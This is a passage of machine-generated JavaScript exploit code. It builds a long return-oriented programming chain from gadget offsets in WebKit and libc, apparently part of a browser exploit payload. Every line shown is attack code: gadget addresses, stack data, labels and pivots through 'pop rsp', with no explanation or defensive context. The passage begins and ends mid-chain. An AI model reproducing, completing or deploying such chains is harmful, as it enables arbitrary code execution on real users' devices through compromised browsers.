ropchain+238224, //L4284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4284:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4285:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4286:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4287:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4288:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+238400, //L4289+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+238392, //L4289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4289:
db([0, 0]); // 0x0
set_gadgets([
ropchain+238416, //L4289+24
ropchain+239672, //L4283
libc_base+764760, //pop rsi
ropchain+238456, //L4290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4290:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4292:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+238576, //L4295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+238560, //L4293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4293:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4295:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+238752, //L4298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+238768, //L4299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+238720, //L4296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+238736, //L4297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4296:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4297:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4298:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4299:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+238928, //L4303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+238896, //L4301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+238912, //L4302
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4300:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4301:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4302:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4303:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+239032, //L4305
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+239016, //L4304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4304:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4305:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+239128, //L4307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4306:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4307:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4308:
db([16, 0]); // 0x10
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+239232, //L4309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+239248, //L4310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4309:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4310:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+239416, //L4312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+239432, //L4313
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+239400, //L4311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4311:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4312:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4313:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+239576, //L4316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+239592, //L4317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+239544, //L4314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4314:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4315:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4316:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4317:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+239664, //L4318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4318:
db([0, 0]); // 0x0
//L4283:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+239792, //L4321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+239808, //L4322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+239776, //L4320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4320:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4321:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4322:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+239920, //L4324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+239968, //L4327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+239936, //L4325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4324:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4325:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4326:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4327:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+240080, //L4328+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+240072, //L4328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4328:
db([0, 0]); // 0x0
set_gadgets([
ropchain+240096, //L4328+24
ropchain+240664, //L4323
libc_base+764760, //pop rsi
ropchain+240136, //L4329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4329:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4331:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+240256, //L4334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+240240, //L4332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4332:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4334:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+240400, //L4337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+240368, //L4335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+240384, //L4336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4335:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4336:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4337:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+240488, //L4339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4338:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L4339:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+240544, //L4340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4340:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4342:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+240624, //L4344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4344:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L4323:
//L4255:
libc_base+764760, //pop rsi
ropchain+240704, //L4345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4345:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4347:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+240824, //L4350
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+240808, //L4348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4348:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4350:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+241000, //L4353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+241016, //L4354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+240968, //L4351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+240984, //L4352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4351:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4352:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4353:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4354:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+241176, //L4358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+241144, //L4356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+241160, //L4357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4355:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4356:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4357:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4358:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+241280, //L4360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+241264, //L4359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4359:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4360:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+241376, //L4362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4361:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4362:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4363:
db([16, 0]); // 0x10
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+241480, //L4364
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+241496, //L4365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4364:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4365:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+241664, //L4367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+241680, //L4368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+241648, //L4366
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4366:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4367:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4368:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+241840, //L4373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+241856, //L4374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+241792, //L4370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4370:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4371:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4372:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4373:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4374:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+241968, //L4375+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+241960, //L4375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4375:
db([0, 0]); // 0x0
set_gadgets([
ropchain+241984, //L4375+24
ropchain+243336, //L4369
libc_base+764760, //pop rsi
ropchain+242024, //L4376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4376:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4378:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+242144, //L4381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+242128, //L4379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4379:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4381:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+242320, //L4384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+242336, //L4385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+242288, //L4382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+242304, //L4383
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4382:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4383:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4384:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4385:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+242432, //L4387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+242416, //L4386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4386:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4387:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4388:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4389:
db([5, 0]); // 0x5
set_gadget(libc_base+763368,); //pop rcx
//L4390:
db([5, 0]); // 0x5
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+242632, //L4392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4392:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+242688, //L4393
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4393:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+242824, //L4397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+242808, //L4396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4395:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4396:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4397:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+242944, //L4400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+242912, //L4398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4398:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4399:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4400:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+243080, //L4402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+243096, //L4403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+243064, //L4401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4401:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4402:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4403:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+243240, //L4406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+243256, //L4407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+243208, //L4404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4404:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4405:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4406:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4407:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+243328, //L4408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4408:
db([0, 0]); // 0x0
//L4369:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+243456, //L4411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+243472, //L4412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+243440, //L4410
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4410:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4411:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4412:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+243632, //L4417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+243648, //L4418
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+243584, //L4414
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4414:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4415:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4416:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4417:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4418:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+243760, //L4419+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+243752, //L4419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4419:
db([0, 0]); // 0x0
set_gadgets([
ropchain+243776, //L4419+24
ropchain+244728, //L4413
libc_base+764760, //pop rsi
ropchain+243816, //L4420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4420:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4422:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+243936, //L4425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+243920, //L4423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4423:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4425:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+244080, //L4428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+244048, //L4426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+244064, //L4427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4426:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4427:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4428:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+244176, //L4430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4429:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4430:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4431:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
